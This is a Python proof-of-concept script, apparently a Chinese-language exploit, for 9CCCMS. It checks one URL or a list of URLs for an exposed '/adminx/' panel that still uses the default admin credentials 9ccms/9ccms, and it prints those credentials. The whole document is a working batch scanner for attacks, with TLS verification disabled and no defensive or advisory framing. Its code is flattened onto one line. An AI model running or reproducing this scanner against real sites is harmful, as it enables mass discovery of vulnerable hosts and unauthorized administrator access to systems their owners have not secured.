久草CMS EXP

#!/usr/bin/env python # -*- coding:utf-8 -*- import time import requests import os from requests.sessions import session os.system('') from requests.packages.urllib3.exceptions import InsecureRequestWarning # 禁用安全请求警告 requests.packages.urllib3.disable_warnings(InsecureRequestWarning) import argparse class poc(): def title(self): print(''' +-----------------------------------------------------------------+ 漏洞名称:9CCCMS 弱口令 功能：单个检测，批量检测 单个检测：python poc.py -u url 批量检测：python poc.py -f 1.txt +-----------------------------------------------------------------+ ''') def poc(self, target_ur): url = f'{target_ur}/adminx/' headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'} try: res = requests.get(url=url, headers=headers,verify=False,timeout=10) return res except Exception as e: print("\033[31m[x] 请求失败 \033[0m", e) def main(self, target_url, file): self.title() count=0 if target_url: res=self.poc(target_url) if res.status_code==200 and "当前使用的是默认账号" in res.text: print(f'\033[31m[+] {target_url} 存在弱口令：9ccms/9ccms \033[0m') if file: for url in file: count += 1 target_url = url.replace('\n', '') #取消换行符 #time.sleep(1) res=self.poc(target_url) try: if res.status_code==200 and "当前使用的是默认账号" in res.text: print(f'\033[31m[{count}] 响应值为200，{target_url} 存在弱口令：9ccms/9ccms\033[0m') else: print(f'[{count}] 响应值为{res.status_code}，{target_url} 不存在弱口令') except Exception as e: print("\033[31m[x] 请求失败 \033[0m", e) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-u','--url',type=str,default=False,help="目标地址，带上http://") parser.add_argument("-f",'--file', type=argparse.FileType('r'),default=False,help="批量检测，带上http://") args = parser.parse_args() run = poc() run.main(args.url, args.file)